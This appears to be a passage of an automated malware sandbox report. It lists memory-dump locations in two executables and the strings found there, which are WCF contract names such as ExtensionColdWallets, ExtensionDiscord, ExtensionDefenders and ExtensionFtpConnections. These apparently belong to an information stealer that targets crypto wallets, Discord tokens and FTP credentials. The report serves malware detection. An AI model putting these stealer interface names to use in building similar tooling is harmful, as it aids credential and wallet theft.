                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionColdWallets
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionColdWalletsLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionColdWalletsResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionColdWalletsResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDefenders
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDefendersLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDefendersResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDefendersResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDiscord
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDiscordLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDiscordResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionDiscordResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnections
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnectionsLR
